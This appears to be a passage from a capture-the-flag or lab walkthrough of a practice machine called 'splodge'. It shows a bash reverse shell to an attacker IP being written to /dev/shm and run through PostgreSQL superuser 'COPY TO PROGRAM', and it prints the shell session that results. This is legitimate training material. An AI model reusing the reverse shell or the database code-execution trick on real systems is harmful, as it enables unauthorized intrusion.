thesplodge
The PostgreSQL instance is compromised as the current DB user is a superuser. Additionally, the instance is running with privileges of the valid system user, thesplodge.
bash-4.2$ whoami
nginx
bash-4.2$ pwd
/dev/shm
bash-4.2$ echo '/bin/bash -i >& /dev/tcp/192.168.45.221/5432 0>&1' > ./thesplodge ; chmod 755 ./thesplodgeCreating a bash reverse shell; thesplodge
postgres=# COPY (SELECT '') to PROGRAM '/dev/shm/thesplodge';Executing the bash reverse shell; thesplodge
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/splodge]
└─$ nnc 5432
listening on [any] 5432 ...
connect to [192.168.45.221] from (UNKNOWN) [192.168.219.108] 49636
bash: no job control in this shell
[thesplodge@splodge .pgdata]$ whoami
whoami
thesplodge
[thesplodge@splodge .pgdata]$ hostname
hostname
splodge
[thesplodge@splodge .pgdata]$ /sbin/ifconfig
/sbin/ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.219.108 netmask 255.255.255.0 broadcast 192.168.219.255
ether 00:50:56:9e:e3:9a txqueuelen 1000 (Ethernet)
RX packets 1321639 bytes 172116626 (164.1 MiB)
RX errors 0 dropped 3037 overruns 0 frame 0
TX packets 1011880 bytes 799515639 (762.4 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 17328 bytes 4475582 (4.2 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 17328 bytes 4475582 (4.2 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0Lateral Movement made to the thesplodge user by abusing the misconfigured PostgreSQL instance